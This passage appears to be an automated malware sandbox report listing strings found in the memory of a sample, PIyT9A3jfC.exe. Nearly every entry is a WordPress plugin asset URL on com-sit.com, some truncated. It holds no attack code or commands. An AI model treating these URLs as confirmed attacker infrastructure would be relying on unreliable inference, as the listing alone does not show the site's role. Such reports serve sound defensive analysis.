PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/complianz-gdpr/assets/css/cookieblocker.min.css?ver=6.5.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/complianz-gdpr/cookiebanner/js/complianz.min.js?ver=6.5.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/connect-polylang-elementor/assets/css/language-switcher.mi
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/css/frontend-lite.min.css?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.14.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.10
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-blocks/assets/js/jet-blocks.min.js?ver=1.3.6
